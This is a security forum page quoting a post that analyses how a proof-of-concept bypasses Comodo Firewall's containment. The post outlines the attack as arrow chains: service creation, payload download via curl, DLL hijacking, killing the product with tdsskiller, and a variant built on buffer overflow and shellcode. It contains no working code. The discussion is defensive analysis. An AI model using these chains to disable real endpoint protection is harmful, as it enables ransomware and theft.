Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Video Reviews - Security and Privacy
Comodo Firewall Bypassing a Bypass
Message
<blockquote data-quote="Andy Ful" data-source="post: 1106507" data-attributes="member: 32260"><p>Here is the original attack flow:</p><p>Run POC -> POC can create services outside containment through magic -> Use service(to run curl.exe) to download the payloads -></p><p>-> Use service to run a file trusted by Comodo and do dll hijacking(the bad dll released escaped.txt) -> Run tdsskiller -> Comodo dead</p><p></p><p>As we can see Comodo did not detect or contain DLL hijacking with bad DLL. It is also common for other AVs, so DLL hijacking popularity is growing.</p><p></p><p>The modified attack flow:</p><p>Exploit (system or benign application) -----> Buffer overflow -----> run shell code -----> <strong><span style="color: rgb(184, 49, 47)">create service</span></strong> ----> use service to download the payloads ----> DLL hijacking (ransomware, info stealer, etc.)</p><p></p><p>In the modified attack, the malicious code is in the DLL (no other file is used to avoid detection/containment).</p><p>Such attack can bypass Comodo without triggering containment, especially when HIPS is disabled or in Safe Mode. The attack is much easier with disabled LUA, because the shell code runs with high privileges. Without this tweak, the exploit needs also another exploit (privilege escalation) to create the service. Exploits without privilege escalation are common. Exploits with privilege escalation are rare and quickly patched.</p><p></p><p>You are an active member on the Comodo forum, so it would be interesting to ask the Comodo staff why they do not disable LUA to improve the containment in Limited, Restricted, and Untrusted settings.</p></blockquote><p></p>
[QUOTE="Andy Ful, post: 1106507, member: 32260"] Here is the original attack flow: Run POC -> POC can create services outside containment through magic -> Use service(to run curl.exe) to download the payloads -> -> Use service to run a file trusted by Comodo and do dll hijacking(the bad dll released escaped.txt) -> Run tdsskiller -> Comodo dead As we can see Comodo did not detect or contain DLL hijacking with bad DLL. It is also common for other AVs, so DLL hijacking popularity is growing. The modified attack flow: Exploit (system or benign application) -----> Buffer overflow -----> run shell code -----> [B][COLOR=rgb(184, 49, 47)]create service[/COLOR][/B] ----> use service to download the payloads ----> DLL hijacking (ransomware, info stealer, etc.) In the modified attack, the malicious code is in the DLL (no other file is used to avoid detection/containment). Such attack can bypass Comodo without triggering containment, especially when HIPS is disabled or in Safe Mode. The attack is much easier with disabled LUA, because the shell code runs with high privileges. Without this tweak, the exploit needs also another exploit (privilege escalation) to create the service. Exploits without privilege escalation are common. Exploits with privilege escalation are rare and quickly patched. You are an active member on the Comodo forum, so it would be interesting to ask the Comodo staff why they do not disable LUA to improve the containment in Limited, Restricted, and Untrusted settings. [/QUOTE]
Insert quotes…
Verification
Post reply
Top
